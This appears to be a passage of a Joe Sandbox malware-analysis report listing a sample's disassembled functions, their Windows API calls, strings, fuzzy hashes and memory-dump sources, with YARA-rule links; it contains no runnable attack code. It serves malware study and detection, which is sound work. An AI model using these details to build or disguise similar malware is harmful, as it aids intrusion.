                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnabledItemLongMessageSend
                                                                                                                                              • String ID: Edit
                                                                                                                                              • API String ID: 3499652902-554135844
                                                                                                                                              • Opcode ID: 66f3ca61536d6a4b5c74c82b61e0e054e33ba564fb4b2e00f887f035e959c592
                                                                                                                                              • Instruction ID: 6ee10451ae2c8e78b307aaf30a1710947c025f2baedac84a9ff3f14969e02c54
                                                                                                                                              • Opcode Fuzzy Hash: 66f3ca61536d6a4b5c74c82b61e0e054e33ba564fb4b2e00f887f035e959c592
                                                                                                                                              • Instruction Fuzzy Hash: 18018E303003327AEA306A66AE05F6BAAA49B54714FD4493BA441D2AA0DFE8DC42C56C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025BF740 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll), ref: 025BF7C5
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 025BF7D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: Invalid$NtCreateKeyedEvent$ntdll
                                                                                                                                              • API String ID: 1646373207-3729888764
                                                                                                                                              • Opcode ID: 3c2b53632a35c1a5eb1eead99cbcb11f700ae754f9a61b1af955f26570a73cb3
                                                                                                                                              • Instruction ID: 3e1d4e926e011bc7fedac0a3767c93bfa554e5c868f7b0e8df13135b82a0ae41
                                                                                                                                              • Opcode Fuzzy Hash: 3c2b53632a35c1a5eb1eead99cbcb11f700ae754f9a61b1af955f26570a73cb3
                                                                                                                                              • Instruction Fuzzy Hash: A511ADB0D403099FDB64DFA1CA087EEBBB8FF04704F140819E915A7A40D3346148CFA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025E2608 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,39838EA3,?,?,00000000,025F197B,000000FF,?,025E25E4,025E26C8,?,025E25B8,00000000), ref: 025E263D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 025E264F
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,025F197B,000000FF,?,025E25E4,025E26C8,?,025E25B8,00000000), ref: 025E2671
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                              • Opcode ID: 202b9e2b47566bd138c67ef4f9af524af4cd92a4dcbabd1609bd29b4fda764a9
                                                                                                                                              • Instruction ID: 7c60d9db11796c5290cc2db8d90085d40fa0ef59457a9ffc1b94891b1eef10db
                                                                                                                                              • Opcode Fuzzy Hash: 202b9e2b47566bd138c67ef4f9af524af4cd92a4dcbabd1609bd29b4fda764a9
                                                                                                                                              • Instruction Fuzzy Hash: 6D01A771940619ABDB158F50DC05FAE7BBCFB04B15F004A25FD12E2290DB749914CA98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A1F7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042A21C
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042A229
                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0042A23F
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,%s.dll), ref: 0042A247
                                                                                                                                                • Part of subcall function 00429F0B: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00429F31
                                                                                                                                                • Part of subcall function 00429F0B: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00429F3C
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F6D
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F75
                                                                                                                                                • Part of subcall function 00429F0B: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00429F82
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F9C
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(000003FF), ref: 00429FA2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConvertDefaultLocale$AddressModuleProclstrcpy$ExtensionFileFindHandleNamePath
                                                                                                                                              • String ID: %s.dll
                                                                                                                                              • API String ID: 2054749690-3668843792
                                                                                                                                              • Opcode ID: 82a8751b84f09603ba11f481d45c7ea045fa609579e678804dedf504626bede6
                                                                                                                                              • Instruction ID: 7c4c11a2dddb72ba6e02242f47b30f39fdadc108ab8537c06b584eb29b98c2af
                                                                                                                                              • Opcode Fuzzy Hash: 82a8751b84f09603ba11f481d45c7ea045fa609579e678804dedf504626bede6
                                                                                                                                              • Instruction Fuzzy Hash: E4F04FB9900218EBCB10EBA0ED49DDE7BBCEB48744F5000B6F945D7150DA74AE46CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004251E5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042BD48: EnterCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD76
                                                                                                                                                • Part of subcall function 0042BD48: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD88
                                                                                                                                                • Part of subcall function 0042BD48: LeaveCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD91
                                                                                                                                                • Part of subcall function 0042BD48: EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BDA3
                                                                                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,0042AFC8,0000000C), ref: 00425209
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0042521C
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042522C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLibrary$AddressFreeInitializeLeaveLoadProc
                                                                                                                                              • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                              • API String ID: 823138501-63838506
                                                                                                                                              • Opcode ID: 3235c455f9abb7d201993a8a1dfe31dcfc0dd767c571edfdb62f33c42e434520
                                                                                                                                              • Instruction ID: 01c63ba424afe4957a6b3b467abc3637d649f32ce2fea976250ac632f5fbc3be
                                                                                                                                              • Opcode Fuzzy Hash: 3235c455f9abb7d201993a8a1dfe31dcfc0dd767c571edfdb62f33c42e434520
                                                                                                                                              • Instruction Fuzzy Hash: 90F08130744721EBD7209F61E90AB07B7E1AF54B06F80883EF046A20A0C73998148B2A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041722A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll,004173A1,?,?,004173C2,?,00000001,00000000,0041CA21,00000003), ref: 0041722F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041723F
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00417253
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 75539706-1276376045
                                                                                                                                              • Opcode ID: 646f169376bb85f1c7a0c0c6dfab7f1782379c0f79f95e05adf5e4d60cba3fd9
                                                                                                                                              • Instruction ID: 6d5ffb320b5c84a2b93882608c5028e86e814d1ab6817c3f9ce84d69c9d90742
                                                                                                                                              • Opcode Fuzzy Hash: 646f169376bb85f1c7a0c0c6dfab7f1782379c0f79f95e05adf5e4d60cba3fd9
                                                                                                                                              • Instruction Fuzzy Hash: 96D0C7303C4200EBD6201B71DD0DE1B3A74AE61F01B84D479B851D1161CB75DC15992D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00413BE3 Relevance: 7.9, APIs: 5, Instructions: 386COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00413C4D
                                                                                                                                              • VariantClear.OLEAUT32(00000007), ref: 00413F7B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004140F0
                                                                                                                                                • Part of subcall function 004150C1: VariantCopy.OLEAUT32(?,?), ref: 004150C9
                                                                                                                                                • Part of subcall function 0041068B: SystemTimeToVariantTime.OLEAUT32(?), ref: 004106D9
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004140D0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Clear$Time$CopySystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2058121879-0
                                                                                                                                              • Opcode ID: 5fca67dab6d645ae0528530928cc235c45b69b13cbb83de34b48013661cf2efe
                                                                                                                                              • Instruction ID: e55dc214bb347d680c00c7b0307744ac7d9360fc785a26e3059a799186a01771
                                                                                                                                              • Opcode Fuzzy Hash: 5fca67dab6d645ae0528530928cc235c45b69b13cbb83de34b48013661cf2efe
                                                                                                                                              • Instruction Fuzzy Hash: 94E16F7090011CEACF15DBA5C890AFEBBB9FF48304F14809BE855A7291DB385A89DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00414111 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004141BB
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414238
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414246
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414254
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00414269
                                                                                                                                                • Part of subcall function 00413BE3: VariantClear.OLEAUT32(?), ref: 00413C4D
                                                                                                                                                • Part of subcall function 004150C1: VariantCopy.OLEAUT32(?,?), ref: 004150C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$ClearFreeString$Copy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3003973349-0
                                                                                                                                              • Opcode ID: 07ac1883145407bfd2158c196e3fcb000a03d1c9a0b2083fd5ca9be8544c246f
                                                                                                                                              • Instruction ID: 42ef2da4cf5b7abc8d447338bc900a50df6f05a4ba720132606da66aa4bd1274
                                                                                                                                              • Opcode Fuzzy Hash: 07ac1883145407bfd2158c196e3fcb000a03d1c9a0b2083fd5ca9be8544c246f
                                                                                                                                              • Instruction Fuzzy Hash: E65107B190020AEFCB14CFE4C9849EEBBB9FF88304F64456EE516A7251D734A985CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040C6F0 Relevance: 7.6, APIs: 5, Instructions: 131COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C719
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040C725
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040C73A
                                                                                                                                              • FreeResource.KERNEL32(00000000), ref: 0040C76C
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0040C810
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeItemLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 996205394-0
                                                                                                                                              • Opcode ID: 933fe36362147815a0cb829be6fd4c4082cb2c7b05a93c302a9bad478cfa2e61
                                                                                                                                              • Instruction ID: 9a54128b345b6d8dc0d7652822505e1427a01eb8725f7af53416f086ccaa2b8d
                                                                                                                                              • Opcode Fuzzy Hash: 933fe36362147815a0cb829be6fd4c4082cb2c7b05a93c302a9bad478cfa2e61
                                                                                                                                              • Instruction Fuzzy Hash: C6511835A0020AEFCB10DF59C484A9EBBB1FF48311F54857AE815AB391D774DA51CF98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258566D Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              • nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 0258563C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2124985433
                                                                                                                                              • Opcode ID: f87a83598c87a8b148fd956fb6f5f26ff7bc571ef5c4006697b1363074591fff
                                                                                                                                              • Instruction ID: 56d9c6cfcccd8676c71f214ae4fa83925e4960d78546302cbd9dd622de257e94
                                                                                                                                              • Opcode Fuzzy Hash: f87a83598c87a8b148fd956fb6f5f26ff7bc571ef5c4006697b1363074591fff
                                                                                                                                              • Instruction Fuzzy Hash: 73413931A04200DFDF25EF20C884BEA7BA6FF94304F144869DD455F295EB719885CF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429379 Relevance: 7.6, APIs: 5, Instructions: 100windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004292DB: GetParent.USER32(?), ref: 0042932E
                                                                                                                                                • Part of subcall function 004292DB: GetLastActivePopup.USER32(?), ref: 0042933D
                                                                                                                                                • Part of subcall function 004292DB: IsWindowEnabled.USER32(?), ref: 00429352
                                                                                                                                                • Part of subcall function 004292DB: EnableWindow.USER32(?,00000000), ref: 00429365
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 004293B2
                                                                                                                                              • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 004293C6
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00429437
                                                                                                                                              • MessageBoxA.USER32(?,?,?,?), ref: 00429445
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00429461
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 489645344-0
                                                                                                                                              • Opcode ID: e5219f551e2044f1e9824b379428219b61050e8523d1673e1e04a8c83f224b8f
                                                                                                                                              • Instruction ID: b24da1c36bf129903a3f53721541c8c3187d1228906e7f3a5e596f08f38fdc97
                                                                                                                                              • Opcode Fuzzy Hash: e5219f551e2044f1e9824b379428219b61050e8523d1673e1e04a8c83f224b8f
                                                                                                                                              • Instruction Fuzzy Hash: 5D318771B00128ABCB20EFA5EC85EEFB7B5EF48700F94456AE551E7280C7759D41CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025AC263 Relevance: 7.6, APIs: 6, Instructions: 91memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2FD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC309
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC313
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC325
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: a3210fbaac0e3c772955a45661e3ca4686840108efc0921b537d131586d61328
                                                                                                                                              • Instruction ID: 0282c388014b58b5ae6d253a2ca1a2d537e2f693d62c12d35b71bdfd5770e3f8
                                                                                                                                              • Opcode Fuzzy Hash: a3210fbaac0e3c772955a45661e3ca4686840108efc0921b537d131586d61328
                                                                                                                                              • Instruction Fuzzy Hash: BA31F170A40604AFDB35AF14DC50A1EBBF6FF8870AF10482AE98547660D731ECA5DB9C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02585646 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
